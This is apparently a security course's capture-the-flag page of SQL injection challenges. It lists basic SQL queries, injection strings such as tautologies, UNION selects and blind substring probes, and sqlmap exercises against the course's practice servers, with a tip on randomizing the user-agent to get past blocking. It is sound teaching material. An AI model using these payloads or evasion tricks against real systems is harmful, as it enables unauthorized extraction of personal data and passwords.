ED 103: SQLI Challenges (30 pts + 155 pts extra)

Section 1. Essential SQL Commands

First, click here to reset the server.

Try these commands to see how SQL works.

SHOW DATABASES
SHOW TABLES
SELECT 1
SELECT "peanut"
SELECT concat("peanut", "butter")
SELECT substr("peanut", 2, 2)
SELECT substr("peanut", 2, 1) = 'e'
SELECT substr("peanut", 2, 1) = 'a'
SELECT * FROM employees
SELECT id FROM employees
SELECT id, 2 FROM employees
SELECT name, id FROM employees WHERE id=1
SELECT concat(name, id) FROM employees WHERE id=1 OR 'cat'='dog' OR 2=2
INSERT INTO employees ( id, name, ssn ) VALUES ( 4, 'Kevin', '999-99-9999');
SELECT * from information_schema.tables
SELECT TABLE_NAME from information_schema.tables
SELECT * from information_schema.columns
SELECT COLUMN_NAME from information_schema.columns
SELECT COLUMN_NAME from information_schema.columns WHERE TABLE_NAME='employees'

Query:

ED 103.1.1: SSN (5 pts)

The flag is Steve Jobs' SSN.

ED 103.1.2: YOUNG_MAKE (10 pts)

Find the data shown below. The flag is covered by a green box.

Hint: Use one of the queries listed above.

Section 2. Simple SQLi

First, click here to reset the server.

Search for these names:

Bill Gates
Tip O'Neil
Sam
Sam' or 1=1 #
Sam' or 'a'='a
Sam' UNION SELECT 1 #

Name:

ED 103.2.1: SSN (15 pts)

The flag is Linus' SSN.

ED 103.2.2: Password (20 pts extra)

The flag is Steve Jobs' password.

ED 103.2.3: Sqlmap on an Unprotected Target (10 pts extra)

On Kali, sqlmap is already installed.

Execute these commands to install Sqlmap on Debian 9:

sudo apt update sudo apt install sqlmap

Use Sqlmap on this target:

http://ad.samsclass.info/sqli/chal2.php?u=x

Find the current username, covered by a green box in the image below. That's the flag.

ED 103.2.4: Sqlmap on a Protected Target (10 pts extra)

First, click here to reset the server.

Use Sqlmap on this target:

https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs

Find the current username, covered by a green box in the image below. That's the flag.

Hint: if you get "forbidden" errors, try randomizing the user-agent

ED 103.2.5: Sqlmap: Retrieving Data (20 pts extra)

Use Sqlmap on this target:

https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs

Recover the data from the tables. The flag is Steve Jobs' SSN.

ED 103.2.6: Sqlmap (20 pts extra)

Use Sqlmap on this target:

https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs

The flag is the id number of the user with admin privileges.

Hint: Explore all the tables.

Section 3. Blind SQLi

First, click here to reset the server.

Try these values:

Bill Gates
x
x' or 'a'='a
x' or 'b'='a
x' or 'a'='a'#
x' or LENGTH(database())=1 #

Name:

ED 103.3.1 Database Name Length (5 pts extra)

The flag is the length of the database's name.

ED 103.3.2 SSN (10 pts extra)

Try these values:

x' UNION select 1#
x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)='B'#
x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)='A'#
x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)>'A'#
x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND length(name)>2#

The flag is the first three digits of Bill Gates' SSN.

ED 103.3.3 ID (5 pts extra)

The flag is admin's ID.

ED 103.3.4 Length (5 pts extra)

The flag is the length of Bill Gates' password.

Hint: First find BIll Gates' ID. Then guess at the name of the field and table containing passwords. Error messages will tell you if your guess is wrong.

ED 103.3.5 Bill's Password (20 pts extra)

The flag is Bill Gates' password.

ED 103.3.6 Password (30 pts extra)

The flag is admin's password.

Updated 5-20-19
Hint about user-agent added 5-21-19
Hint added to 103.3.4
Point total corrected 9-9-19
Hint added to 103.1.2 9-11-19
Example of WHERE added to Section 1 2-4-21
Background color changed 1-18-22
103.2.6 challenge rephrased 2-12-23
Video added 3-15-23